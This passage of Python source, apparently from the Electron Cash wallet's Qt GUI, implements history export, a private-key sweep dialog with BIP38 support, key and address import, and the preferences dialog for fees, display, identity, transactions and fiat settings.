transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
success = True
# kick off the waiting dialog to do all of the above
dlg = WaitingDialog(self.top_level_window(),
_("Exporting history, please wait ..."),
task, on_success, self.on_error, disable_escape_key=True,
auto_exec=False, auto_show=False, progress_bar=True, progress_min=0, progress_max=100)
dlg.exec_()  # blocks here in the WaitingDialog event loop; on_success sets success = True
return success
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'pycryptodomex' or omit BIP38 private keys (private keys starting with 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
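# sweep flow: decrypt any BIP38 keys (prompting for their passphrases), find
# the coins spendable by the keys, then pre-fill the Send tab and spend max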
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.gui_object.is_cashaddr():
return QIcon(":icons/tab_converter.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def cashaddr_status_tip(self):
if self.gui_object.is_cashaddr():
return _('Address Format') + ' - ' + _('CashAddr')
else:
return _('Address Format') + ' - ' + _('Legacy')
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
self.addr_converter_button.setStatusTip(self.cashaddr_status_tip())
def toggle_cashaddr_status_bar(self):
self.gui_object.toggle_cashaddr()
self.statusBar().showMessage(self.cashaddr_status_tip(), 2000)
def toggle_cashaddr_settings(self, state):
self.gui_object.toggle_cashaddr(state == Qt.Checked)
def toggle_cashaddr(self, on):
self.print_error('*** WARNING ElectrumWindow.toggle_cashaddr: This function is deprecated. Please do not call it!')
self.gui_object.toggle_cashaddr(on)
def settings_dialog(self):
class SettingsModalDialog(WindowModalDialog):
shown_signal = pyqtSignal()
def showEvent(self, e):
super().showEvent(e)
self.shown_signal.emit()
self.need_restart = False
dialog_finished = False
d = SettingsModalDialog(self.top_level_window(), _('Preferences'))
d.setObjectName('WindowModalDialog - Preferences')
destroyed_print_error(d)
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
misc_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be '
'displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
self.fee_slider_mogrifier()
fee_gb = QGroupBox(_('Fees'))
fee_lo = QGridLayout(fee_gb)
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom fee rate:'), _('Custom Fee Rate in Satoshis per byte'))
fee_lo.addWidget(customfee_label, 0, 0, 1, 1, Qt.AlignRight)
fee_lo.addWidget(customfee_e, 0, 1, 1, 1, Qt.AlignLeft)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_lo.addWidget(feebox_cb, 1, 0, 1, 2, Qt.AlignJustify)
# Fees box up top
misc_widgets.append((fee_gb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
# this ensures that even if exception occurs or we exit function early,
# the signal is disconnected
disconnect_alias_received_signal = Weak.finalize(d, self.alias_received_signal.disconnect, set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_gb = QGroupBox(_("Identity"))
id_form = QFormLayout(id_gb)
id_form.addRow(alias_label, alias_e)
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_form.addRow(SSL_id_label, SSL_id_e)
# Identity box in middle of this tab
misc_widgets.append((id_gb, None)) # commit id_form/id_gb to master layout via this data structure
from . import exception_window as ew
cr_gb = QGroupBox(_("Crash Reporter"))
cr_grid = QGridLayout(cr_gb)
cr_chk = QCheckBox()
cr_chk.setChecked(ew.is_enabled(self.config))
cr_chk.clicked.connect(lambda b: ew.set_enabled(self.config, b))
cr_help = HelpLabel(_("Crash reporter enabled"),
_("The crash reporter is the error window which pops-up when Electron Cash encounters an internal error.\n\n"
"It is recommended that you leave this option enabled, so that developers can be notified of any internal bugs. "
"When a crash is encountered you are asked if you would like to send a report.\n\n"
"Private information is never revealed in crash reports to developers."))
# The below dance ensures the checkbox is horizontally centered in the widget
cr_grid.addWidget(QWidget(), 0, 0, 1, 1) # dummy spacer
cr_grid.addWidget(cr_chk, 0, 1, 1, 1, Qt.AlignRight)
cr_grid.addWidget(cr_help, 0, 2, 1, 1, Qt.AlignLeft)
cr_grid.addWidget(QWidget(), 0, 3, 1, 1) # dummy spacer
cr_grid.setColumnStretch(0, 1)
cr_grid.setColumnStretch(3, 1)
# Crash reporter box at bottom of this tab
misc_widgets.append((cr_gb, None)) # commit crash reporter gb to layout
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
+ _('These settings affect the fields in the Send tab') + ' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
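# on_unit re-renders amounts already typed into the send/receive/fee fields
# at the new decimal point, so the user's numbers survive the unit change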
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online block explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_label = HelpLabel(_('Video device'), '')
qr_did_scan = False
def set_no_camera(e=''):
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label.setText(_('Video device') + ' ' + _('(disabled)') + ':')
qr_label.help_text = qr_combo.toolTip() + "\n\n" + str(e)
qr_label.setToolTip(qr_combo.toolTip())
def scan_cameras():
nonlocal qr_did_scan
if qr_did_scan or dialog_finished:
# already scanned, or the dialog finished quickly -- the dialog_finished
# guard is needed because this slot is invoked via QueuedConnection
return
qr_did_scan = True
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
except ImportError as e:
set_no_camera(e)
return
system_cameras = QCameraInfo.availableCameras()
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_label.setText(_('Video device') + ':')
qr_label.help_text = _("For scanning QR codes.")
qr_combo.setToolTip(qr_label.help_text)
qr_label.setToolTip(qr_label.help_text)
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = max(0, qr_combo.findData(video_device)) # if not found, default to 0 (the default item)
qr_combo.setCurrentIndex(video_device_index)
qr_combo.setEnabled(True)
def on_video_device(x):
if qr_combo.isEnabled():
self.config.set_key("video_device", qr_combo.itemData(x), True)
set_no_camera() # pre-populate combo box with default so it has a sizeHint
d.shown_signal.connect(scan_cameras, Qt.QueuedConnection) # do the camera scan once dialog is shown, using QueuedConnection so it's called from top level event loop and not from the showEvent handler
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Default'), 'default') # We can't name this "light" in the UI as sometimes the default is actually dark-looking eg on Mojave or on some Linux desktops.
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
if sys.platform in ('darwin',) and not dark_theme_available:
msg = _("Color theme support is provided by macOS if using Mojave or above."
" Use the System Preferences to switch color themes.")
err_msg = msg
else:
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
err_msg = _("Dark theme is not available. Please install QDarkStyle to access this feature.")
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(err_msg)
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high-DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
if sys.platform in ('win32', 'cygwin'):
# Enable/Disable the use of the FreeType library on Qt
# (Windows only)
freetype_chk = QCheckBox(_('Use FreeType for font rendering'))
freetype_chk.setChecked(self.gui_object.windows_qt_use_freetype)
freetype_chk.setEnabled(self.config.is_modifiable('windows_qt_use_freetype'))
freetype_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_freetype_chk():
self.gui_object.windows_qt_use_freetype = freetype_chk.isChecked() # property has a method backing it
self.need_restart = True
freetype_chk.stateChanged.connect(on_freetype_chk)
gui_widgets.append((freetype_chk, None))
elif sys.platform in ('linux',):
# Enable/Disable the use of the fonts.xml FontConfig override
# (Linux only)
fontconfig_chk = QCheckBox(_('Use custom fontconfig for emojis'))
fontconfig_chk.setChecked(self.gui_object.linux_qt_use_custom_fontconfig)
fontconfig_chk.setEnabled(self.config.is_modifiable('linux_qt_use_custom_fontconfig'))
fontconfig_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_fontconfig_chk():
self.gui_object.linux_qt_use_custom_fontconfig = fontconfig_chk.isChecked() # property has a method backing it
self.need_restart = True
fontconfig_chk.stateChanged.connect(on_fontconfig_chk)
gui_widgets.append((fontconfig_chk, None))
# CashAddr control
gui_widgets.append((None, None)) # spacer
address_w = QGroupBox(_('Address Format'))
address_w.setToolTip(_('Select between Cash Address and Legacy formats for addresses'))
hbox = QHBoxLayout(address_w)
cashaddr_cbox = QComboBox()
cashaddr_cbox.addItem(QIcon(':icons/tab_converter.svg'), _("CashAddr"), Address.FMT_CASHADDR)
cashaddr_cbox.addItem(QIcon(':icons/tab_converter_bw.svg'), _("Legacy"), Address.FMT_LEGACY)
cashaddr_cbox.setCurrentIndex(0 if self.gui_object.is_cashaddr() else 1)
def cashaddr_cbox_handler(ignored_param):
fmt = int(cashaddr_cbox.currentData())
self.gui_object.toggle_cashaddr(fmt == Address.FMT_CASHADDR)
cashaddr_cbox.currentIndexChanged.connect(cashaddr_cbox_handler)
hbox.addWidget(cashaddr_cbox)
toggle_cashaddr_control = QCheckBox(_('Hide status button'))
toggle_cashaddr_control.setToolTip(_('If checked, the status bar button for toggling address formats will be hidden'))
toggle_cashaddr_control.setChecked(self.gui_object.is_cashaddr_status_button_hidden())
toggle_cashaddr_control.toggled.connect(self.gui_object.set_cashaddr_status_button_hidden)
hbox.addWidget(toggle_cashaddr_control)
gui_widgets.append((address_w, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setToolTip('')
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multiple_cb.setToolTip('')
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Legacy BCT Segwit Send Protection™
legacy_p2sh_cb = QCheckBox(_('Allow legacy p2sh in the Send tab'))
prefix_char = '3' if not networks.net.TESTNET else '2'
legacy_p2sh_cb.setToolTip(_('If enabled, you will be allowed to use legacy \'{prefix_char}...\' style addresses in the Send tab.\nOtherwise you must use CashAddr for p2sh in the UI.').format(prefix_char=prefix_char))
legacy_p2sh_cb.setChecked(bool(self.config.get('allow_legacy_p2sh', False)))
def on_legacy_p2sh_cb(b):
self.config.set_key('allow_legacy_p2sh', bool(b))
legacy_p2sh_cb.stateChanged.connect(on_legacy_p2sh_cb)
global_tx_widgets.append((legacy_p2sh_cb, None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Sign with Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
# Fiat Tab (only build it if not on testnet)
#
# Note that at the present time self.fx is always defined, including for --offline mode;
# we will check if self.fx is not None here just in case that changes some day.
if self.fx and self.fx.is_supported():
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([pgettext('Referencing Fiat currency', 'None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
# hmm, previous exchange wasn't in new h= setting. Try default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
hist_checkbox.setText(_('Show history rates'))
fiat_address_checkbox.setText(_('Show fiat balance for addresses'))
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency:')), ccy_combo))
fiat_widgets.append((QLabel(_('Source:')), ex_combo))
fiat_widgets.append((hist_checkbox, None))
fiat_widgets.append((fiat_address_checkbox, None))
else:
# For testnet(s) and for --taxcoin we do not support Fiat display
lbl = QLabel(_("Fiat display is not supported on this chain."))
lbl.setAlignment(Qt.AlignHCenter|Qt.AlignVCenter)
f = lbl.font()
f.setItalic(True)
lbl.setFont(f)
fiat_widgets = [(lbl, None)]
tabs_info = [
(gui_widgets, _('General')),
(misc_widgets, pgettext("The preferences -> Fees,misc tab", 'Fees && Misc.')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
]
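# tabs_info pairs each tab's payload with a title: a plain list of (left,
# right) widget pairs becomes a single grid, while an OrderedDict of
# {group_name: pairs} (as for 'Transactions' above) becomes stacked group
# boxes -- see add_tabs_info_to_tabs below.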
def add_tabs_info_to_tabs(tabs, tabs_info):
def add_widget_pair(a,b,grid):
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
try:
# run the dialog
d.exec_()
finally:
dialog_finished = True # paranoia for scan_cameras
